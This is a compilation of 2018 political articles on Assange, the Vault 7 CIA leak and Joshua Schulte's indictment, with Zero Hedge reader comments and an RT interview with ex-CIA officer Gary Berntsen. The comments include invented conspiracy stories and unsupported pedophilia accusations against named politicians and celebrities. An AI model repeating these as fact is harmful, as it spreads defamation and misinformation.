"... The report does not say what led Comey to intervene to ruin the talks with Assange. But it came after Assange had offered to "provide technical evidence and discussion regarding who did not engage in the DNC releases," Solomon quotes WikiLeaks' intermediary with the government as saying. It would be a safe assumption that Assange was offering to prove that Russia was not WikiLeaks' source of the DNC emails. ..."
"... If that was the reason Comey and Warner ruined the talks, as is likely, it would reveal a cynical decision to put U.S. intelligence agents and highly sophisticated cybertools at risk, rather than allow Assange to at least attempt to prove that Russia was not behind the DNC leak. ..."
"... On March 31, 2017, though, WikiLeaks released the most damaging disclosure up to that point from what it called "Vault 7" -- a treasure trove of CIA cybertools leaked from CIA files. This disclosure featured the tool "Marble Framework," which enabled the CIA to hack into computers, disguise who hacked in, and falsely attribute the hack to someone else by leaving so-called tell-tale signs -- like Cyrillic, for example. The CIA documents also showed that the "Marble" tool had been employed in 2016. ..."
"... In fact, VIPS and independent forensic investigators, have performed what former FBI Director Comey -- at first inexplicably, now not so inexplicably -- failed to do when the so-called "Russian hack" of the DNC was first reported. In July 2017 VIPS published its key findings with supporting data. ..."
"... Why did then FBI Director Comey fail to insist on getting direct access to the DNC computers in order to follow best-practice forensics to discover who intruded into the DNC computers? (Recall, at the time Sen. John McCain and others were calling the "Russian hack" no less than an "act of war.") A 7th grader can now figure that out. ..."
Jun 27, 2018 | consortiumnews.com

Did Sen. Warner and Comey 'Collude' on Russia-gate? June 27, 2018

The U.S. was in talks for a deal with Julian Assange but then FBI Director James Comey ordered an end to negotiations after Assange offered to prove Russia was not involved in the DNC leak, as Ray McGovern explains.

By Ray McGovern
Special to Consortium News

An explosive report by investigative journalist John Solomon on the opinion page of Monday's edition of The Hill sheds a bright light on how Sen. Mark Warner (D-VA) and then-FBI Director James Comey collaborated to prevent WikiLeaks editor Julian Assange from discussing "technical evidence ruling out certain parties [read Russia]" in the controversial leak of Democratic Party emails to WikiLeaks during the 2016 election.

A deal that was being discussed last year between Assange and U.S. government officials would have given Assange "limited immunity" to allow him to leave the Ecuadorian Embassy in London, where he has been exiled for six years. In exchange, Assange would agree to limit through redactions "some classified CIA information he might release in the future," according to Solomon, who cited "interviews and a trove of internal DOJ documents turned over to Senate investigators." Solomon even provided a copy of the draft immunity deal with Assange.

But Comey's intervention to stop the negotiations with Assange ultimately ruined the deal, Solomon says, quoting "multiple sources." With the prospective agreement thrown into serious doubt, Assange "unleashed a series of leaks that U.S. officials say damaged their cyber warfare capabilities for a long time to come." These were the Vault 7 releases, which led then CIA Director Mike Pompeo to call WikiLeaks "a hostile intelligence service."

Solomon's report provides reasons why Official Washington has now put so much pressure on Ecuador to keep Assange incommunicado in its embassy in London.

Assange: Came close to a deal with the U.S. (Photo credit: New Media Days / Peter Erichsen)

The report does not say what led Comey to intervene to ruin the talks with Assange. But it came after Assange had offered to "provide technical evidence and discussion regarding who did not engage in the DNC releases," Solomon quotes WikiLeaks' intermediary with the government as saying. It would be a safe assumption that Assange was offering to prove that Russia was not WikiLeaks' source of the DNC emails.

If that was the reason Comey and Warner ruined the talks, as is likely, it would reveal a cynical decision to put U.S. intelligence agents and highly sophisticated cybertools at risk, rather than allow Assange to at least attempt to prove that Russia was not behind the DNC leak.

The greater risk to Warner and Comey apparently would have been if Assange provided evidence that Russia played no role in the 2016 leaks of DNC documents.

Missteps and Stand Down

In mid-February 2017, in a remarkable display of naiveté, Adam Waldman, Assange's pro bono attorney who acted as the intermediary in the talks, asked Warner if the Senate Intelligence Committee staff would like any contact with Assange to ask about Russia or other issues. Waldman was apparently oblivious to Sen. Warner's stoking of Russia-gate.

Warner contacted Comey and, invoking his name, instructed Waldman to "stand down and end the discussions with Assange," Waldman told Solomon. The "stand down" instruction "did happen," according to another of Solomon's sources with good access to Warner. However, Waldman's counterpart attorney David Laufman, an accomplished federal prosecutor picked by the Justice Department to work the government side of the CIA-Assange fledgling deal, told Waldman, "That's B.S. You're not standing down, and neither am I."

But the damage had been done. When word of the original stand-down order reached WikiLeaks, trust evaporated, putting an end to two months of what Waldman called "constructive, principled discussions that included the Department of Justice."

The two sides had come within inches of sealing the deal. Writing to Laufman on March 28, 2017, Waldman gave him Assange's offer to discuss "risk mitigation approaches relating to CIA documents in WikiLeaks' possession or control, such as the redaction of Agency personnel in hostile jurisdictions," in return for "an acceptable immunity and safe passage agreement."

On March 31, 2017, though, WikiLeaks released the most damaging disclosure up to that point from what it called "Vault 7" -- a treasure trove of CIA cybertools leaked from CIA files. This disclosure featured the tool "Marble Framework," which enabled the CIA to hack into computers, disguise who hacked in, and falsely attribute the hack to someone else by leaving so-called tell-tale signs -- like Cyrillic, for example. The CIA documents also showed that the "Marble" tool had been employed in 2016.

Misfeasance or Malfeasance

Comey: Ordered an end to talks with Assange.

Veteran Intelligence Professionals for Sanity, which includes among our members two former Technical Directors of the National Security Agency, has repeatedly called attention to its conclusion that the DNC emails were leaked -- not "hacked" by Russia or anyone else (and, later, our suspicion that someone may have been playing Marbles, so to speak).

In fact, VIPS and independent forensic investigators have performed what former FBI Director Comey -- at first inexplicably, now not so inexplicably -- failed to do when the so-called "Russian hack" of the DNC was first reported. In July 2017 VIPS published its key findings with supporting data.

Two months later, VIPS published the results of follow-up experiments conducted to test the conclusions reached in July.

Why did then FBI Director Comey fail to insist on getting direct access to the DNC computers in order to follow best-practice forensics to discover who intruded into the DNC computers? (Recall, at the time Sen. John McCain and others were calling the "Russian hack" no less than an "act of war.") A 7th grader can now figure that out.

Asked on January 10, 2017 by Senate Intelligence Committee chair Richard Burr (R-NC) whether direct access to the servers and devices would have helped the FBI in their investigation, Comey replied: "Our forensics folks would always prefer to get access to the original device or server that's involved, so it's the best evidence."

At that point, Burr and Warner let Comey down easy. Hence, it should come as no surprise that, according to one of John Solomon's sources, Sen. Warner (who is co-chairman of the Senate Intelligence Committee) kept Sen. Burr apprised of his intervention into the negotiation with Assange, leading to its collapse.

Ray McGovern works with Tell the Word, a publishing arm of the ecumenical Church of the Saviour in inner-city Washington. He was an Army Infantry/Intelligence officer and then a CIA analyst for a total of 30 years and prepared and briefed, one-on-one, the President's Daily Brief from 1981 to 1985.


[Jun 19, 2018] DOJ Indicts Vault 7 Leak Suspect; WikiLeaks Release Was Largest Breach In CIA History Zero Hedge

Jun 19, 2018 | www.zerohedge.com

A 29-year-old former CIA computer engineer, Joshua Adam Schulte, was indicted Monday by the Department of Justice on charges of masterminding the largest leak of classified information in the spy agency's history.

Schulte, who created malware for the U.S. Government to break into adversaries' computers, has been sitting in jail since his August 24, 2017 arrest on unrelated charges of possessing and transporting child pornography - which was discovered in a search of his New York apartment after Schulte was named as the prime suspect in the cyber-breach one week after WikiLeaks published the "Vault 7" series of classified files. Schulte was arrested and jailed on the child porn charges while the DOJ ostensibly built their case leading to Monday's additional charges.

[I]nstead of charging Mr. Schulte in the breach, referred to as the Vault 7 leak, prosecutors charged him last August with possessing child pornography, saying agents had found 10,000 illicit images on a server he created as a business in 2009 while studying at the University of Texas at Austin.

Court papers quote messages from Mr. Schulte that suggest he was aware of the encrypted images of children being molested by adults on his computer, though he advised one user, "Just don't put anything too illegal on there." - New York Times

Monday's DOJ announcement adds new charges related to stealing classified national defense information from the Central Intelligence Agency in 2016 and transmitting it to WikiLeaks ("Organization-1").

The Vault 7 release - a series of 24 documents which began to publish on March 7, 2017 - reveal that the CIA had a wide variety of tools to use against adversaries, including the ability to "spoof" its malware to appear as though it was created by a foreign intelligence agency, as well as the ability to take control of Samsung Smart TVs and surveil a target using a "Fake Off" mode in which they appear to be powered down while eavesdropping.

The CIA's hand crafted hacking techniques pose a problem for the agency. Each technique it has created forms a "fingerprint" that can be used by forensic investigators to attribute multiple different attacks to the same entity.

...

The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation.

With UMBRAGE and related projects the CIA cannot only increase its total number of attack types but also misdirect attribution by leaving behind the "fingerprints" of the groups that the attack techniques were stolen from.

UMBRAGE components cover keyloggers, password collection, webcam capture, data destruction, persistence, privilege escalation, stealth, anti-virus (PSP) avoidance and survey techniques. - WikiLeaks

Schulte previously worked for the NSA before joining the CIA, then "left the intelligence community in 2016 and took a job in the private sector," according to a statement reviewed in May by The Washington Post.

Schulte also claimed that he reported "incompetent management and bureaucracy" at the CIA to that agency's inspector general as well as a congressional oversight committee. That painted him as a disgruntled employee, he said, and when he left the CIA in 2016, suspicion fell upon him as "the only one to have recently departed [the CIA engineering group] on poor terms," Schulte wrote. - WaPo

Part of that investigation, reported WaPo, has been analyzing whether the Tor network - which allows internet users to hide their location (in theory) "was used in transmitting classified information."

In other hearings in Schulte's case, prosecutors have alleged that he used Tor at his New York apartment, but they have provided no evidence that he did so to disclose classified information. Schulte's attorneys have said that Tor is used for all kinds of communications and have maintained that he played no role in the Vault 7 leaks. - WaPo

Schulte says he's innocent: "Due to these unfortunate coincidences the FBI ultimately made the snap judgment that I was guilty of the leaks and targeted me," Schulte said. He launched Facebook and GoFundMe pages to raise money for his defense, which despite a $50 million goal, has yet to receive a single donation.

The Post noted in May, the Vault 7 release was one of the most significant leaks in the CIA's history, "exposing secret cyberweapons and spying techniques that might be used against the United States, according to current and former intelligence officials."

The CIA's toy chest includes:

"The source code shows that Marble has test examples not just in English but also in Chinese, Russian, Korean, Arabic and Farsi. This would permit a forensic attribution double game, for example by pretending that the spoken language of the malware creator was not American English, but Chinese, but then showing attempts to conceal the use of Chinese, drawing forensic investigators even more strongly to the wrong conclusion, --- but there are other possibilities, such as hiding fake error messages."


"Year Zero" documents show that the CIA breached the Obama administration's commitments. Many of the vulnerabilities used in the CIA's cyber arsenal are pervasive and some may already have been found by rival intelligence agencies or cyber criminals.

In addition to its operations in Langley, Virginia the CIA also uses the U.S. consulate in Frankfurt as a covert base for its hackers covering Europe, the Middle East and Africa.

CIA hackers operating out of the Frankfurt consulate ( "Center for Cyber Intelligence Europe" or CCIE) are given diplomatic ("black") passports and State Department cover.

These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloackman by hacking the "smart" phones that they run on and collecting audio and message traffic before encryption is applied.

CIA hackers developed successful attacks against most well known anti-virus programs. These are documented in AV defeats, Personal Security Products, Detecting and defeating PSPs and PSP/Debugger/RE Avoidance. For example, Comodo was defeated by CIA malware placing itself in the Windows' "Recycle Bin". While Comodo 6.x has a "Gaping Hole of DOOM".

You can see the entire Vault7 release here.

A DOJ statement involving the Vault7 charges reads:

"Joshua Schulte, a former employee of the CIA, allegedly used his access at the agency to transmit classified material to an outside organization. During the course of this investigation, federal agents also discovered alleged child pornography in Schulte's New York City residence," said Manhattan U.S. Attorney Geoffrey S. Berman.

On March 7, 2017, Organization-1 released on the Internet classified national defense material belonging to the CIA (the "Classified Information"). In 2016, SCHULTE, who was then employed by the CIA, stole the Classified Information from a computer network at the CIA and later transmitted it to Organization-1. SCHULTE also intentionally caused damage without authorization to a CIA computer system by granting himself unauthorized access to the system, deleting records of his activities, and denying others access to the system. SCHULTE subsequently made material false statements to FBI agents concerning his conduct at the CIA.

Schulte faces 135 years in prison if convicted on all 13 charges:

  1. Illegal Gathering of National Defense Information, 18 U.S.C. §§ 793(b) and 2
  2. Illegal Transmission of Lawfully Possessed National Defense Information, 18 U.S.C. §§ 793(d) and 2
  3. Illegal Transmission of Unlawfully Possessed National Defense Information, 18 U.S.C. §§ 793(e) and 2
  4. Unauthorized Access to a Computer To Obtain Classified Information, 18 U.S.C. §§ 1030(a)(1) and 2
  5. Theft of Government Property, 18 U.S.C. §§ 641 and 2
  6. Unauthorized Access of a Computer to Obtain Information from a Department or Agency of the United States, 18 U.S.C. §§ 1030(a)(2) and 2
  7. Causing Transmission of a Harmful Computer Program, Information, Code, or Command, 18 U.S.C. §§ 1030(a)(5) and 2
  8. Making False Statements, 18 U.S.C. §§ 1001 and 2
  9. Obstruction of Justice, 18 U.S.C. §§ 1503 and 2
  10. Receipt of Child Pornography, 18 U.S.C. §§ 2252A(a)(2)(B), (b)(1), and 2
  11. Possession of Child Pornography, 18 U.S.C. §§ 2252A(a)(5)(B), (b)(2), and 2
  12. Transportation of Child Pornography, 18 U.S.C. § 2252A(a)(1)
  13. Criminal Copyright Infringement, 17 U.S.C. § 506(a)(1)(A) and 18 U.S.C. § 2319(b)(1)

Billy the Poet -> Anarchyteez Mon, 06/18/2018 - 22:50

So Schulte was framed for kiddie porn because he released information about how the CIA can frame innocent people for computer crime.

A Sentinel -> Billy the Poet Mon, 06/18/2018 - 22:59

That seems very likely.

Seems like everyone has kiddy porn magically appear and get discovered after they piss off the deep state bastards.

And the best part is that it's probably just the deep state operatives' own private pedo collections that they use to frame anyone who they don't like.

A Sentinel -> CrabbyR Mon, 06/18/2018 - 23:46

I was thinking about the advancement of the technology necessary for that. They can do perfect fake stills already.

My thought is that you will soon need to film yourself 24/7 (with timestamps, shared with blockchain-like verifiability) so that you can disprove fake video evidence by having a filmed alibi.

CrabbyR -> A Sentinel Tue, 06/19/2018 - 00:07

Good point, but creepy to think it can get that bad.

peopledontwanttruth -> Anarchyteez Mon, 06/18/2018 - 22:50

Funny how all these whistleblowers are being held for child pornography until trial.

But we have evidence of government officials and Hollyweird being involved in this perversion, and they walk among us.

secretargentman -> peopledontwanttruth Mon, 06/18/2018 - 22:51

Those kiddy porn charges are extremely suspect, IMO.

chunga -> secretargentman Mon, 06/18/2018 - 23:12

It's so utterly predictable.

The funny* thing is I believe gov, particularly upper levels, is chock full of pedophiles.

* It isn't funny, my contempt for the US gov grows practically by the hour.

A Sentinel -> chunga Mon, 06/18/2018 - 23:42

I said pretty much the same. I further speculated that it was their own porn that they use for framing operations.

SybilDefense -> A Sentinel Tue, 06/19/2018 - 00:33

Ironically, every single ex-gov whistleblower (/pedophile) has the exact same kiddie porn data on their secret server (hidden in plain view at the apartment). Joe CIA probably has a zip drive preloaded with titled data sets like "Podesta's Greatest Hits", "Hillary's Honey Bunnies" or "Willy Go to the Zoo". Like the mix tapes you used to make for a new gal you were trying to date. Depending upon the mood of the agent in charge, 10,000 images of Weiner's "Warm Pizza" playlist magically appear on the server in 3-2-1... Gotcha!

These false fingerprint tactics were all over the Trump accusations which started the whole Russia Russia Russia ordeal. And the Russia ordeal was conceptualized in a paid report to Podesta by the Bensenson Group called the Salvage Program when it was apparent that Trump could possibly win and the DNC needed ideas on how to throw the voters off at the polls. "Russia is coming"/Red Dawn was #1 or #2 on the list of 7 recommended ploys. The final one was crazy... If Trump appeared to win the election, imagery of Jesus and an alien invasion was to be projected into the skies to cause mass panic and create a demand for free Xanax to be handed out to the panic-stricken.

Don't forget Black Lives Matter. That was idea #4 of this Bensenson report, to create civil unrest and a race war. Notice how BLM and Antifa manically disappeared after Nov 4. All a ploy by the Dems & the deep state to remain in control of the country's power.

Back to the topic at hand. It's a wonder he didn't get Seth Riched. Too many porn servers and we will begin to question the legitimacy. Oh wait...

You won't find any kiddie porn on Hillary's or DeNiro's laptop. Oh, it's there. You just will never ever hear about it.

cankles' server -> holdbuysell Mon, 06/18/2018 - 22:57

The Vault 7 release - a series of 24 documents which began to be published on March 7, 2017 - reveals that the CIA had a wide variety of tools to use against adversaries, including the ability to "spoof" its malware to appear as though it was created by a foreign intelligence agency ....

It probably can spoof child porn as well.

Is he charged with copyright infringement for pirating child porn?

BGO Mon, 06/18/2018 - 22:43

The intel community sure has a knack for sussing out purveyors of child pornography. It's probably just a coincidence govt agencies and child pornography are inextricably linked.

Never One Roach -> BGO Mon, 06/18/2018 - 22:44

Sounds like he may be a friend of Uncle Joe Biden whom we know is "very, very friendly" with the children.

NotBuyingIt -> BGO Mon, 06/18/2018 - 23:09

It's very easy for a criminal spook to plant child porn on some poor slob's machine - especially when they want to keep him on the hook to sink his ass for something bigger in the future. Who knows... this guy may have done some shit but I'm willing to bet he was entirely targeted by these IC assholes. Facing 135 years in prison... yet that baggy ass cunt Hillary walks free...

DoctorFix -> BGO Mon, 06/18/2018 - 23:18

Funny how they always seem to have a "sting" operation in progress when there's anyone the DC rats want to destroy but strangely, or not, silent as the grave when one of the special people are fingered.

MadHatt Mon, 06/18/2018 - 22:43

Transportation of Child Pornography, 18 U.S.C. § 2252A(a)(1)

Uhh... what? He stole CIA child porn?

navy62802 -> MadHatt Mon, 06/18/2018 - 23:30

Nah ... that's the shit they planted on him for an excuse to make an arrest.

MadHatt -> navy62802 Tue, 06/19/2018 - 00:29

If he stole all their hacking apps, wouldn't that be enough to arrest him?

Never One Roach Mon, 06/18/2018 - 22:44

That list of federal crimes is almost as long as Comey's list of Hillary Clinton's federal crimes.

_triplesix_ Mon, 06/18/2018 - 22:46

Of all these things the C_A can do, it doesn't take a brain surgeon to realize that planting CP on a computer of someone you don't like would be a piece of cake, comparatively speaking.

Giant Meteor -> _triplesix_ Mon, 06/18/2018 - 22:51

It probably comes standard now buried within systems, like a sleeper cell. Just waiting for the right infraction and trigger to be pulled ..

PigMan Mon, 06/18/2018 - 22:50

Did he also leak that the CIA's favorite tactic is to plant kiddie porn on their targets' computers?

ConnectingTheDots Mon, 06/18/2018 - 22:56

The alphabet agencies would never hack someone's computer.

The alphabet agencies would never spy on US citizens (at least not wittingly).

The alphabet agencies would never plant physical evidence.

The alphabet agencies would never lie under oath.

The alphabet agencies would never have an agenda.

The alphabet agencies would never provide the media with false information.

/s

Chupacabra-322 Mon, 06/18/2018 - 23:14

The "Spoofing" or Digital Finger Print & Parallel Construction tools that can be used against Governments, Individuals, enemies & adversaries are Chilling.

The CIA can not only hack into anything -- they can download any "evidence" they want onto your phone or computer. Child pornography, national secrets, you name it. Then they can blackmail you, threatening prosecution for whatever crap they have planted, then "found" on your computer. They can also "spoof" the source of such downloads -- for instance, if they want to "prove" that something on your computer (or Donald Trump's computer) came from a "Russian source" -- they can spoof the IP address of a Russian source.

The take-away: no digital evidence the CIA or NSA produces on any subject whatsoever can be trusted. No digital evidence should be acceptable in any case where the government has an interest, because they have the complete ability to fabricate and implant any evidence on any iPhone or computer. And worse: they have intentionally created these digital vulnerabilities and pushed them onto the whole world via Microsoft and Google. Government has long been at war with liberty, claiming that we need to give up liberty to be secure. Now we learn that they have been deliberately sabotaging our security, in order to augment their own power. Time to shut down the CIA and all the other spy agencies. They're not keeping us free OR secure, and they're doing it deliberately. Their main function nowadays seems to be lying us into wars against countries that never attacked us, and had no plans to do so.

The Echelon computer system catches everything.

The flagging goes to notify the appropriate alphabet agency... key words, phrases... algorithms... It all gets sucked up and chewed on and spat out to the surmised, computed correct departments... That simple.

Effective immediately defund, eliminate & subpoena its agents, officials & dept. heads in regard to the mass surveillance, global espionage spying network & monitoring of a President-elect by the aforementioned agencies & former President Obama, AG Lynch & DIA James Clapper, CIA John Brennan.

#SethRich

#Vault7

#UMBRAGE

ZIRPdiggler -> Chupacabra-322 Tue, 06/19/2018 - 00:29

Since 9/11, they've been "protecting" the shit out of us. "Protecting" away every last fiber of liberty. Was watching some fact-based media about the CIA's failed plan to install Yeltsin's successor via a Wall Street banking cartel bet (see LTCM implosion). The ultimate objectives were to rape and loot post-Soviet Russian resources and enforce regime change. It's such a tired playbook at this point. Who DOESN'T know about this sort of affront? Apparently even Nobel prize economists can't prevent a nation from failing, lol. The ultimate in vanity; our gubmint and its shadow controllers.

moobra Mon, 06/18/2018 - 23:45

This is because people who are smart enough to write malware for the CIA send messages in the clear about child porn and are too dumb to encrypt images with a key that would take the lifetime of the universe to break.

Next his mother will be found to have a tax problem and his brother's credit rating zeroed out.

Meanwhile Comey will be found to have been "careless".

ZIRPdiggler Tue, 06/19/2018 - 00:05

Yeah, I don't believe for a second that this guy had anything to do with child porn. Not like Obama and his hotdogs or Clintons at pedo island, or how bout uncle pervie Podesta? Go after them, goons and spooks. They (intelligence agencies) falsely accuse people of exactly what they are ass-deep in. It loses credibility with me when the CIA clowns or NSA fuck-ups accuse anyone of child porn; especially one of their former employees who is 'disgruntled'. LOL. Another spook railroad job done on a whistleblower. Fuck the CIA and all 17 alphabet agencies who spy on us 24/7. Just ask, if you want to snoop on me. I may even tell you what I'm up to because I have nothing that I would hide since I don't give a shit about you or whether you approve of what I am doing.

AGuy -> ZIRPdiggler Tue, 06/19/2018 - 00:36

"Yeah I don't believe for a second that this guy had anything to do with child porn."

Speculation on my part: He was running a Tor server, and the porn originated from other Tor users. If that is the case (it would be easy for law enforcement to just assume it was his), law enforcement enjoys a quick and easy case.

rgraf Tue, 06/19/2018 - 00:05

They shouldn't be spying, and they shouldn't keep any secrets from the populace. If they weren't doing anything wrong, they have nothing to hide.

ZIRPdiggler -> rgraf Tue, 06/19/2018 - 00:09

It really doesn't matter if someone wants to hide. That is their right. Only Nazis like our spy agencies would use the old Gestapo line, "If you have nothing to hide then you have nothing to worry about. Or better yet, you should let me turn your life upside down if you have nothing to hide." Bullshit! It's none of their fucking business. How bout that? Spooks and secret clowns CAN and DO frame anybody for whatever or murder whomever they wish. So why WOULDN'T people be afraid when government goons start sticking their big snouts into their lives??? They can ruin your life for the sake of convenience. Zee Furor is not pleased with your attitude, comrade.

Blue Steel 309 Tue, 06/19/2018 - 00:53

Vault 7 proves that most digital evidence should be inadmissible in court, yet I don't see anyone publishing articles about this problem.

[Jun 02, 2018] Obama used NSA FBI to spy on Trump veteran CIA officer

Notable quotes:
"... Let me just say this: the President used the word "wiretapping" but I think it was very clear to us that have been in the intelligence business, that this was a synonym for "surveillance". ..."
"... When I was in senior position in CIA's counterterrorism center, I had a deputy who was an FBI officer. An office in FBI HQ down in Washington had an FBI lead with a CIA deputy. There's a lot more cooperation than one would think. There are individuals that do assignments in each other's organisations to help foster levels of cooperation. I had members of NSA in my staff when I was at CIA, members of diplomatic security, members of Alcohol, Tobacco and Firearms, and it was run like a task force, so, there's a lot more cooperation than the media presents, they always think that there are these huge major battles between the organisations and that's rarely true. ..."
"... John Brennan is acting more like a political operative than a former director of CIA. ..."
Mar 20, 2017 | www.youtube.com

The mighty CIA has fallen victim to a major breach, with WikiLeaks revealing the true scope of the Agency's ability for cyber-espionage. Its tools seem to be aimed at ordinary citizens – your phone, your car, your TV, even your fridge can become an instrument of surveillance in the hands of the CIA. How does the CIA use these tools, and why do they need them in the first place?

And as WikiLeaks promises even more revelations, how is all of this going to shape the already tense relationship between new president and the intelligence community?

A man who has spent over two decades in the CIA's clandestine service – Gary Berntsen is on SophieCo.

FULL TRANSCRIPT: https://www.rt.com/shows/sophieco/381...

Sophie Shevardnadze: Gary Berntsen, former CIA official, welcome to the show, great to have you with us. Now, Vault 7, a major batch of CIA docs revealed by Wikileaks, uncovers the agency's cyber tools. We're talking about the world's most powerful intelligence agency - how exactly did the CIA lose control of its arsenal of hacking weapons?

Gary Berntsen: First off, I'd like to say that the world has changed a lot in the last several decades, and people are communicating in many different ways, and intelligence services, whether they be American or Russian, are covering these communications, and their coverage of those communications has evolved. Without commenting on the specific validity of those tools, it was clear that the CIA was surely using contractors to be involved in this process, not just staff officers, and that individuals decided that they had problems with U.S. policy, and have leaked these things to Wikileaks. This is a large problem for the U.S. community, but just as the U.S. is having problems, Russia faces similar problems. Just this week you had multiple members of the FSB charged with hacking as well, and they have been charged by the U.S. government. So both services, who are competitors, face challenges as we've entered a new era of mass communications.

SS: So like you're saying, the leaker or leakers of the CIA docs is presumably a CIA contractor - should the agency be spending more effort on vetting its own officers? Is the process rigorous enough?

GB: Clearly. Look, there have been individuals since the dawn of history (espionage is the second oldest occupation) who have conducted spying and espionage operations, and there have been people who have turned against their own side and worked for competitors and worked for those opposing the country or the group that they're working with. It's been a problem from the beginning, and it continues to be a problem, and the U.S. clearly is going to have to do a much better job at vetting those individuals who are given security clearances, without a doubt.

SS: The CIA studied the flaws in the software of devices like iPhones, Androids, Smart TVs, apps like Whatsapp that left them exposed to hacking, but didn't care about patching those up - so, in essence the agency chose to leave Americans vulnerable to cyberattacks, rather than protect them?

GB: I think you have to understand, in this world that we're operating in, the number one target of our intelligence community is terrorists. Since the attacks of 9/11, 16 years ago, the obsession of the American intelligence community is to identify those planning terrorist attacks, collecting information on them and being able to defeat them. These individuals are using all these means of communication. I have spoken with many security services around the world since my retirement back in 2005-2006; a lot of them have had problems covering the communications on the very devices and programs that you've talked about - whether they be narcotraffickers or salafist jihadists, they are all piggybacking off of commercial communications. Therefore the need for modern intelligence services to sort of provide coverage of all means of communications. And there's a price that you pay for that.

SS: One of the most disturbing parts of the leaks is the "Weeping Angel" program - CIA hacking into Samsung Smart TVs to record what's going on even when the TV appears to be turned off. Why are the CIA's tools designed to penetrate devices used by ordinary Western citizens at home?

GB: Look, I wouldn't say it has anything to do with Western homes, because the CIA doesn't do technical operations against American citizens - that's prohibited by the law. If the CIA does anything in the U.S., it does it side-by-side with the FBI, and it does it according to FISA - the Foreign Intelligence and Surveillance Act laws. It's gotta go to the judge to do those things. Those tools are used primarily against the individuals and terrorists that are targeting the U.S. or other foreign entities that we see as a significant threat to the U.S. national security, which is the normal functioning of any intelligence service.

SS: Just like you say, the CIA insists it never uses its investigative tools on American citizens in the US, but, we're wondering, exactly how many terrorist camps in the Middle East have Samsung Smart TVs to watch their favorite shows on? Does it seem like the CIA lost its direction?

GB: Plenty of them.

SS: Plenty?...

GB: I've travelled in the Middle East, Samsungs are sold everywhere. Sophie, Samsung TVs are sold all over the world. I've spent a lot of time in the Middle East, I've seen them in Afghanistan, I've seen them everywhere. So, any kind of devices that you can imagine, people are using everywhere. We're in a global economy now.

SS: The CIA has tools to hack iPhones - but they make up only around 15% of the world's smartphone market. iPhones are not popular among terrorists, but they are among business and political elites - so are they the real target here?

GB: No. The CIA in relative terms to the size of the world is a small organisation. It is an organisation that has roughly 20 or more thousand people - it's not that large in terms of covering a planet with 7 billion people. We have significant threats to the U.S. and to the Western world. We live in an age of super-terrorism, we live in an age when individuals, small groups of people, can leverage technology at a lethal effect. The greatest threats to this planet are not just nuclear, they are bio. The U.S. needs to have as many tools as possible to defend itself against these threats, as does Russia want to have similar types of tools to defend itself. You too, Russian people have suffered from a number of terrible terrorist acts.

SS: Wikileaks suggest the CIA copied the hacking habits of other nations to create a fake electronic trace - why would the CIA need that?

GB: The CIA, as any intelligence service, would look to conduct coverage in the most unobtrusive fashion as possible. It is going to do its operations so that they can collect and collect again and again against terrorist organisations, where and whenever it can, because sometimes threats are not just static, they are continuous.

SS: You know this better, so enlighten me: does the CIA have the authorisation to create the surveillance tools it had in the first place? Who gives it such authorisation?

GB: The CIA was created in 1947 by the National Security Act of the U.S. and does two different things - it does FI (foreign intelligence) collection and it does CA - covert action. Its rules for collection of intelligence were enshrined in the law that created it, the CIA Act 110, in 1949, but the covert action part of this, where it does active measures, when it gets involved in things - all of those are covered by law. The Presidential finding had to be written, it had to be presented to the President. The President signs off on those things. Those things are then briefed to members of Congress, or the House Permanent Subcommittee for Intelligence and the Senate Select Committee for Intelligence. We have a very rigorous process of review of the activities of our intelligence communities in the U.S.

SS: But you're talking about the activities in terms of operations. I'm just asking - does the CIA need any authorisation or permission to create the tools it has in its arsenal? Or can it just go ahead?

GB: Those tools and the creation of collection tools falls under the same laws that allowed the CIA to be established. And that was the 1949 Intelligence Act. And also, subsequently, the laws in 1975. Yes.

SS: So, the CIA programme names are quite colourful, sometimes wacky - "Weeping Angel", "Swamp Monkey", "Brutal Kangaroo" - is there a point to these, is there any logic, or are they completely random? I always wondered...

GB: There's absolutely no point to that, and it's random.

SS: Okay, so how do you come up with those names? Who, like, one says: "Monkey" and another one says: "Kangaroo"?...

GB: I'm sure they are computer-generated.

SS: Trump accused Obama of wiretapping him during the campaign. Could the CIA have actually spied on the president? It seems like the agency doesn't have the best relationship with Donald Trump - how far can they go?

GB: Let me just say this: the President used the word "wiretapping" but I think it was very clear to us that have been in the intelligence business, that this was a synonym for "surveillance". Because most people are on cellphones, people aren't using landlines anymore, so there's no "wiretapping", okay. These all fall under the Intelligence Surveillance Act, as I stated earlier, this thing existing in the U.S. It was clear to President Trump and to those in his campaign, after they were elected, and they did a review back, that the Obama Administration sought FISA authorisation to do surveillance of the Trump campaign in July and then in October. They were denied in July, they were given approval in October, and in October they did some types of surveillance of the Trump campaign. This is why the President, of course, tweeted that he had been "wiretapped" - of course "wiretapping" being a synonym for the surveillance against his campaign, which was never heard of in U.S. political history that I can remember, I can't recall any way of this being done. It's an outrage, and at the same time, Congressional hearings are going to be held and they are going to review all of these things, and they are going to find out exactly what happened and what was done. It's unclear right now, but all we do know - and it has been broken in the media - is that there were two efforts, and at the second one, the authorisation was given. That would never have been done by the CIA, because they don't do that sort of coverage in the U.S. That would either be the FBI or the NSA, with legal authorities. The problem that the Trump administration had is they believed that the information from these things was distributed incorrectly. Any time an American - and this is according to the U.S. law - any time an American is on the wire in the U.S., their names have got to be minimized from this, and it clearly wasn't done, and the Trump administration was put in a bad light because of this.

SS: If what you're saying is true, how does that fall under foreign intelligence? Is that more of the FBI-NSA expertise?

GB: It was FBI and NSA - it was clearly the FBI and the NSA that were involved, it would never have been the CIA doing that, they don't listen to telephones in the U.S., they read the product of other agencies that would provide those things, but clearly, there were individuals on those phone calls that they believed were foreign and were targeting those with potential communications with the Trump campaign. Let's be clear here - General Clapper, the DNI for President Obama, stated before he left office that there was no, I repeat, no evidence of collusion between the Trump campaign and Russia. This has been something that has been dragged out again, and again, and again, by the media. This is a continuing drumbeat of the mainstream, left-wing media of the U.S., to paint the President in the poorest light, to attempt to discredit Donald Trump.

SS: With the intelligence agencies bringing down Trump's advisors like Michael Flynn - and you said the people behind that were Obama's loyalists - can we talk about the intelligence agencies being too independent from the White House, playing their own politics?

